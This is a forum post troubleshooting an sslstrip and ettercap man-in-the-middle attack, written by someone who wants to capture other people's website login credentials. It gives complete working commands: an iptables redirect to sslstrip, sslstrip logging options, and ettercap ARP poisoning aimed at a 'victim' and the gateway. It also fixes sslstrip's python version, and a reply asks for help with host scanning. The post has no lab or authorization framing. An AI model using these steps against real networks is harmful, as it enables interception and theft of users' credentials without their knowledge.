Issue with sslstrip and ettercap (Mitm attacks) (SOLVED)

I've been scratching my head the last few days and finally found the answer to why I wasn't getting credentials to logins at sites.
A LOT of videos and how-to write ups for ettercap and sslstrip and everyone seems to say something different. I have to give credit to Maverick35 for leading me in this direction to find the answer
Other sites I've been to say to do the following (ex.):

#Open Terminal
#Redirects requests on port 80 to sslstrip running on port 10000

Quote:

---

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000]

---

Quote:

---

echo "1" > /proc/sys/net/ipv4/ip_forward

---

#You can check the forwarding if you want by typing:

Quote:

---

cat /proc/sys/net/ip_forward

---

#You should see a "1" there

#New Terminal

#Run sslstrip logging on port 10000

Quote:

---

sslstrip -p -f

---

#I use -p for log only SSL Posts. -f substitutes a lock favicon on secure requests

#(Optional) You can monitor the log

Quote:

---

tail -F sslstrip.log

---

#Launch ettercap gui with packet dump

Quote:

---

ettercap -G -w ~/ettercap_packets.pcap

---

#In Ettercap enter unified sniffing

Quote:

---

Sniff->Unified Sniffing

---

#Select your interface

Quote:

---

wlan0 (example)

---

#Scan for hosts

Quote:

---

Hosts->Scan for hosts

---

#View hosts list for scan

Quote:

---

Hosts->Hosts list

---

#Select Targets

Quote:

---

Highlight the victim -> Add to Target 1
Highlight the victim -> Add to Target 2

---

#View the added targets

Quote:

---

Targets -> Current Targets

---

#Perform Arp poisoning (Mitm attack) on targets

Quote:

---

Mitm -> Arp Poisoning (Sniff remote connections)

---

#Start

Quote:

---

Start -> Start Sniffing

---

This was giving me no love here. If you man ettercap you will see that ettercap already does the forwarding for you (/proc/sys/net/ipv4/ip_forward) so there is no need to do it. In fact if you run ettercap after you type in that command it will just set the (/proc/sys/net/ipv4/ip_forward) back to "0" afterwards. Try cat /proc/sys/net/ipv4/ip_forward after running ettercap and you will see it will set the kernel to "0". It describes it in the man page.

The real issue I was having was with sslstrip. I didn't know it until a little while ago. I wasn't getting credentials on all sites like I was hoping. Come to find out sslstrip (I'm using .9 version) only works with python 2.5 and up. If you look at the sslstrip.py file at gedit /pentest/web/sslstrip/sslstrip.py you will see at the top:

Quote:

---

#!/usr/bin/env python

---

#You need to change it to:

Quote:

---

#!/usr/bin/python2.6

---

The quickest way to setup everyting for me and have it working is without GUI and just type below:

iptables -t nat --flush (To flush any added rules to the nat tables)
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sslstrip -p -f (only logging https and uses the Favicon)

OPEN another terminal:
ettercap -Tqi "your interface" -M arp:remote /Victim/ /Gateway/ -P autoadd (you can also just do // /Gateway/ , if you want to get all targets)

Thats it. After that everything was working smooth.

Hello Altoid. Can you help me in figuring out about a trouble in ettercap usage. I don't get the Attacker (backtrack OS) in list when i scan for hosts. It gives me the Host OS (WIN 07) and my gateway (internet router) in the hosts list. I am using Backtrack in VM Ware with network adapter in bridged mode.